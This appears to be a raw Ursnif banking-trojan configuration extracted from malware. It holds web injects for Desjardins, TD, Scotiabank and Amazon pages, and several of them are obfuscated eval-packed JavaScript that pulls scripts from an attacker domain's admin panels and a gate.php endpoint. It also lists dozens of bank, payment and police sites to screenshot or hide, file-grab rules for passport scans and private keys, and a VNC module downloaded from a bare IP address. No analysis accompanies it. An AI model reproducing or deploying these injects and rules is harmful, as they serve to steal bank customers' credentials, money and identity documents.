Ursnif

https://acc*.mouv.desjardins.com/*
<head**>
<head**><inject></inject>
https://acc*.mouv.desjardins.com/*
<HEAD**>
<HEAD**><inject></inject>
https://acc*.mouv.desjardins.com/*
<inject></inject>
<inject></inject><script>var script_link = "https://4allgod.com/desjardinsadmin/desjardins.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 J=(4(){7 d,g,8={};8["[9 16]"]="17";8["[9 18]"]="19";8["[9 K]"]="1a";8["[9 1b]"]="4";8["[9 1c]"]="L";8["[9 1d]"]="1e";8["[9 1f]"]="1g";8["[9 M]"]="9";7 f={t:m,u:1,1h:4(a){3(a){f.u++}j{f.6(n)}},6:4(a){3((a===n&&!--f.u)||(a!==n&&!f.t)){3(!2.N){5 C(f.6,1)}f.t=n;3(a!==n&&--f.u>0){5}d.v(2,[f])}},O:4(){3(d){5}d=f.P();3(2.Q==="R"){5 C(f.6,1)}3(2.w){2.w("g",g,m);D.w("1i",f.6,m)}j 3(2.x){2.x("S",g);D.x("1j",f.6);7 a=m;E{a=D.1k==T}U(e){}3(2.V.W&&a){F()}}},P:4(){7 c=[],k,o,y,l={G:4(){3(!y){7 a=X,i,p,q,h,r;3(k){r=k;k=0}1l(i=0,p=a.p;i<p;i++){q=a[i];h=f.h(q);3(h==="L"){l.G.Y(l,q)}j 3(h==="4"){c.1m(q)}}3(r){l.v(r[0],r[1])}}5 s},v:4(a,b){3(!y&&!k&&!o){b=b||[];o=1;E{1n(c[0]){c.1o().Y(a,b)}}1p{k=[a,b];o=0}}5 s},1q:4(){l.v(s,X);5 s},1r:4(){5!!(o||k)},1s:4(){y=1;c=[];5 s}};5 l},h:4(a){5 a==T?K(a):8[M.1t.1u.1v(a)]||"9"}};4 F(){3(f.t){5}E{2.V.W("1w")}U(e){C(F,1);5}f.6()}3(2.w){g=4(){2.1x("g",g,m);f.6()}}j 3(2.x){g=4(){3(2.Q==="R"){2.1y("S",g);f.6()}}}4 6(a){f.O();7 b=f.h(a);d.G(a)}5 6})();4 Z(){3(2.H("z")){2.H("z").1z.1A(2.H("z"))}7 a="1B {1C:1D !1E}";7 b=2.10("1F");b.11("h","12/1G");b.11("13","z");3(1H.1I.1J().1K("1L")>=0){b.1M=a}j{3(b.14){b.14.1N=a}j{b.A(2.1O(a))}}2.B("I")[0].A(b)}4 15(a){7 b=2.10("1P");b.h="12/1Q";b.13="1R";b.1S=a;3(2.B("I").p>0){2.B("I")[0].A(b)}j{2.B("N")[0].A(b)}}Z();J(4(){15(1T)});',62,118,'||document|if|function|return|ready|var|class2type|object|||||||DOMContentLoaded|type||else|fired|deferred|false|true|firing|length|elem|_fired|this|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|document_hide_css|appendChild|getElementsByTagName|setTimeout|window|try|doScrollCheck|done|getElementById|head|cReady|String|array|Object|body|bindReady|_Deferred|readyState|complete|onreadystatechange|null|catch|documentElement|doScroll|arguments|apply|hideContent|createElement|setAttribute|text|id|styleSheet|loadScript|Boolean|boolean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
https://easyweb*.td*.com/*
<head**>
<head**><script>if (/(FinancialSummaryServlet)|(login\.htm)/im.test(self.location.href)){var script_link = "https://4allgod.com/tdadmin/td.js?r="+Number(new Date());var script = document.createElement("script");script.type = "text/javascript";script.src = script_link;document.getElementsByTagName("head")[0].appendChild(script);}</script>
http*://www*.scotiabank.com/gls/*/index.html
<head**>
<head**><script>top.location.href = "http://www.scotiabank.com/ca/en/0,,2,00.html";
</script>
https://www*.scotiaonline.scotiabank.com/online/*
<head**>
<head**><script>var script_link = "https://4allgod.com/scotiaadmin/scotia.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 J=(4(){7 d,g,8={};8["[9 16]"]="17";8["[9 18]"]="19";8["[9 K]"]="1a";8["[9 1b]"]="4";8["[9 1c]"]="L";8["[9 1d]"]="1e";8["[9 1f]"]="1g";8["[9 M]"]="9";7 f={t:m,u:1,1h:4(a){3(a){f.u++}j{f.6(n)}},6:4(a){3((a===n&&!--f.u)||(a!==n&&!f.t)){3(!2.N){5 C(f.6,1)}f.t=n;3(a!==n&&--f.u>0){5}d.v(2,[f])}},O:4(){3(d){5}d=f.P();3(2.Q==="R"){5 C(f.6,1)}3(2.w){2.w("g",g,m);D.w("1i",f.6,m)}j 3(2.x){2.x("S",g);D.x("1j",f.6);7 a=m;E{a=D.1k==T}U(e){}3(2.V.W&&a){F()}}},P:4(){7 c=[],k,o,y,l={G:4(){3(!y){7 a=X,i,p,q,h,r;3(k){r=k;k=0}1l(i=0,p=a.p;i<p;i++){q=a[i];h=f.h(q);3(h==="L"){l.G.Y(l,q)}j 3(h==="4"){c.1m(q)}}3(r){l.v(r[0],r[1])}}5 s},v:4(a,b){3(!y&&!k&&!o){b=b||[];o=1;E{1n(c[0]){c.1o().Y(a,b)}}1p{k=[a,b];o=0}}5 s},1q:4(){l.v(s,X);5 s},1r:4(){5!!(o||k)},1s:4(){y=1;c=[];5 s}};5 l},h:4(a){5 a==T?K(a):8[M.1t.1u.1v(a)]||"9"}};4 F(){3(f.t){5}E{2.V.W("1w")}U(e){C(F,1);5}f.6()}3(2.w){g=4(){2.1x("g",g,m);f.6()}}j 3(2.x){g=4(){3(2.Q==="R"){2.1y("S",g);f.6()}}}4 6(a){f.O();7 b=f.h(a);d.G(a)}5 6})();4 Z(){3(2.H("z")){2.H("z").1z.1A(2.H("z"))}7 a="1B {1C:1D !1E}";7 b=2.10("1F");b.11("h","12/1G");b.11("13","z");3(1H.1I.1J().1K("1L")>=0){b.1M=a}j{3(b.14){b.14.1N=a}j{b.A(2.1O(a))}}2.B("I")[0].A(b)}4 15(a){7 b=2.10("1P");b.h="12/1Q";b.13="1R";b.1S=a;3(2.B("I").p>0){2.B("I")[0].A(b)}j{2.B("N")[0].A(b)}}Z();J(4(){15(1T)});',62,118,'||document|if|function|return|ready|var|class2type|object|||||||DOMContentLoaded|type||else|fired|deferred|false|true|firing|length|elem|_fired|this|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|document_hide_css|appendChild|getElementsByTagName|setTimeout|window|try|doScrollCheck|done|getElementById|head|cReady|String|array|Object|body|bindReady|_Deferred|readyState|complete|onreadystatechange|null|catch|documentElement|doScroll|arguments|apply|hideContent|createElement|setAttribute|text|id|styleSheet|loadScript|Boolean|boolean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
http*://*amazon.com*
<head**>
<head**><script>var home_link = "https://4allgod.com/amazonccadmin";var gate_link = home_link+"/gate.php";var pkey = "Bc5rw12";eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1g(){8 a={U:t,V:t,I:t,W:t},X;X=3.B;u{3.B=""}w(e){}a.Y=1R 3.B=="1h"?!0:1S("/*@1T!@*/!1");u{3.B=X}w(e){}2(a.Y){a.W=(/^(?:.*?[^a-1U-Z])??(?:1V|1W\\s*\\:)\\s*(\\d+\\.?\\d*)/i).11(1i.1j||"")?1k(1l.$1,10):t;8 e,J,x,13=3.14("1X"),15=["{1Y-1m-1n-1o-1p}","{1Z-1m-1n-1o-1p}","{20-21-22-23-24}"];u{13.1q.25="26(#27#28)"}w(e){}16(x=0;x<15.r;x++){u{a.I=13.29(15[x],"2a").2b(/,/g,".")}w(e){}2(a.I)2c}J=1k(a.I||"0",10);a.V=3.B||((/2d/i).11(3.2e||"")?5:J)||a.W;a.U=J||a.V}2(/2f/2g.11(1i.1j)){9"1r"}m{2(a.Y){9"2h"+a.U}m{9"2i"}}}8 17=1g();8 19=(7(){7 2j(b){7 k(a){9"%"+f.1a(a>>4)+f.1a(a&2k)}8 c="2l-2m.~";8 d="!*\'();:@&=+$,/?%#[]";8 e=c+d;8 f="2n";b=b+"";8 g="";2(!b||b.r==0){9""}16(8 i=0;i<b.r;i++){8 h=b.1a(i);2(c.2o(h)!=-1){g=g+h}m{8 j=b.2p(i);2(j<2q){g=g+k(j)}2(j>2r&&j<2s){g=g+k((j>>6)|2t);g=g+k((j&y)|z)}2(j>2u&&j<2v){g=g+k((j>>12)|2w);g=g+k(((j>>6)&y)|z);g=g+k((j&y)|z)}2(j>2x){g=g+k((j>>18)|2y);g=g+k(((j>>12)&y)|z);g=g+k(((j>>6)&y)|z);g=g+k((j&y)|z)}}}9 g}7 1s(){2(3.1b("K")){3.1b("K").2z.2A(3.1b("K"))}8 a="2B {2C:2D !2E}";8 b=3.14("1q");b.1t("p","1u/2F");b.1t("1v","K");2(17=="1r"){b.2G=a}m{2(b.1w){b.1w.2H=a}m{b.L(3.2I(a))}}3.M("1c")[0].L(b)}7 1x(a){a+="&2J="+17;8 b=3.14("2K");b.p="1u/2L";b.1v="2M";b.2N=a;2(3.M("1c").r>0){3.M("1c")[0].L(b)}m{3.M("1y")[0].L(b)}}7 1z(){1x(N.2O+"/2P.2Q?2R="+1A(2S 1B()))}9{1C:7(){1z()},1D:7(){1s()}}}());8 1E=(7(){8 d,q,n={};n["[o 2T]"]="2U";n["[o 1A]"]="1h";n["[o 1F]"]="2V";n["[o 2W]"]="7";n["[o 2X]"]="1G";n["[o 1B]"]="2Y";n["[o 1l]"]="2Z";n["[o 1H]"]="o";8 f={O:C,P:1,30:7(a){2(a){f.P++}m{f.l(D)}},l:7(a){2((a===D&&!--f.P)||(a!==D&&!f.O)){2(!3.1y){9 1d(f.l,1)}f.O=D;2(a!==D&&--f.P>0){9}d.Q(3,[f])}},1I:7(){2(d){9}d=f.1J();2(3.1K==="1L"){9 1d(f.l,1)}2(3.R){3.R("q",q,C);N.R("31",f.l,C)}m 2(3.S){3.S("1M",q);N.S("32",f.l);8 a=C;u{a=N.33==t}w(e){}2(3.1N.1O&&a){1e()}}},1J:7(){8 c=[],v,E,T,A={1f:7(){2(!T){8 a=1P,i,r,F,p,G;2(v){G=v;v=0}16(i=0,r=a.r;i<r;i++){F=a[i];p=f.p(F);2(p==="1G"){A.1f.1Q(A,F)}m 2(p==="7"){c.34(F)}}2(G){A.Q(G[0],G[1])}}9 H},Q:7(a,b){2(!T&&!v&&!E){b=b||[];E=1;u{35(c[0]){c.36().1Q(a,b)}}37{v=[a,b];E=0}}9 H},38:7(){A.Q(H,1P);9 H},39:7(){9!!(E||v)},3a:7(){T=1;c=[];9 H}};9 A},p:7(a){9 a==t?1F(a):n[1H.3b.3c.3d(a)]||"o"}};7 1e(){2(f.O){9}u{3.1N.1O("3e")}w(e){1d(1e,1);9}f.l()}2(3.R){q=7(){3.3f("q",q,C);f.l()}}m 2(3.S){q=7(){2(3.1K==="1L"){3.3g("1M",q);f.l()}}}7 l(a){f.1I();8 b=f.p(a);d.1f(a)}9 l})();19.1D();1E(7(){19.1C()});',62,203,'||if|document||||function|var|return|||||||||||gethex|ready|else|class2type|object|type|DOMContentLoaded|length||null|try|fired|catch||0x3F|0x80|deferred|documentMode|false|true|firing|elem|_fired|this|verIEtrue|verTrueFloat|document_hide_css|appendChild|getElementsByTagName|window|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|verIE|docModeIE|verIE_ua|tmp|isIE|||test||obj|createElement|CLASSID|for|browser_type||iLoader|charAt|getElementById|head|setTimeout|doScrollCheck|done|detectBrowser|number|navigator|userAgent|parseFloat|RegExp|A269|11D1|B5BF|0000F8051515|style|FF|hideContent|setAttribute|text|id|styleSheet|loadScript|body|run|Number|Date|Run|HideContent|cReady|String|array|Object|bindReady|_Deferred|readyState|complete|onreadystatechange|documentElement|doScroll|arguments|apply|typeof|eval|cc_on|zA|MSIE|rv|div|45EA75A0|3AF36230|89820200|ECBD|11CF|8B85|00AA005B4383|behavior|url|default|clientcaps|getComponentVersion|componentid|replace|break|back|compatMode|firefox|im|IE|OTHER|urlEncode|0xF|0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz|_|0123456789ABCDEFabcdef|indexOf|charCodeAt|128|127|2048|0xC0|2047|65536|0xE0|65535|0xF0|parentNode|removeChild|html|display|none|important|css|innerHTML|cssText|createTextNode|bt|script|javascript|jsess_script_loader|src|home_link|amazon|js|ssid|new|Boolean|boolean|string|Function|Array|date|regexp|holdReady|load|onload|frameElement|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent'.split('|'),0,{}));</script>
*pkobp.pl/aktualnosci/ogolnokrajowe/uwaga-wazna-informacja/
HIDDEN
*pekaobiznes24.pl/*/floatingads.min.js*
HIDDEN
*ipkobiznes.pl/ikd_img/skins/ipko/pko_loqo.png?*
HIDDEN
*pekaobiznes24.pl/*/flo*.min.js*
HIDDEN
*pekaobiznes24.pl/*/*ads.min.js*
HIDDEN
*ipkobiznes.pl*
SCREENSHOT
/html
*bpmbanking.it*
SCREENSHOT
/html
*ib.mps.it*
SCREENSHOT
/html
*skrill.com*
SCREENSHOT
/html
*pekaobiznes24.pl*
SCREENSHOT
/html
*cedacri.it*
SCREENSHOT
/html
*westernunion*
SCREENSHOT
/html
*policja.gov.pl*
SCREENSHOT
/html
*moneygram*
SCREENSHOT
/html
*fxonline.*
SCREENSHOT
/html
*paypal.*
SCREENSHOT
summary
*secure.halifax-online.co.uk/personal*
SCREENSHOT
/html
*nab.com.au*
SCREENSHOT
/html
*commbank.com*
SCREENSHOT
/html
*anz.com*
SCREENSHOT
/html
*citidirect.com*
SCREENSHOT
/html
*agricole.pl*
SCREENSHOT
/html
*companynet.mbank.pl/*
SCREENSHOT
/html
*pbsbank.p*
SCREENSHOT
/html
*.cui.p*
SCREENSHOT
/html
*net-bank.com.p*
SCREENSHOT
/html
*bankbps.p*
SCREENSHOT
/html
*bosbank24.p*
SCREENSHOT
/html
*vwbankdirect*
SCREENSHOT
/html
*.sgb.p*
SCREENSHOT
/html
*.bawagpsk.com/*
SCREENSHOT
/html
*bankmillennium.pl*
SCREENSHOT
/html
*korporacja.gb24.pl*
SCREENSHOT
/html
*r-bank.pl*
SCREENSHOT
/html
*ingbusinessonline.pl*
SCREENSHOT
/html
*ibiznes24.pl/*
SCREENSHOT
/html
*desjardins.com/*
SCREENSHOT
/html
*easyweb*
SCREENSHOT
/html
*scotiabank.com*
SCREENSHOT
/html
SIAsecure.tok
FILE
passaporto.jpg
FILE
passaporto.bmp
FILE
passaporto.gif
FILE
*.prw
FILE
paszport*.jpg
FILE
paszport*.gif
FILE
*.prv
FILE
*paypal.com*
VNC
31.184.234.74/vncdll32.bin,31.184.234.74/vncdll64.bin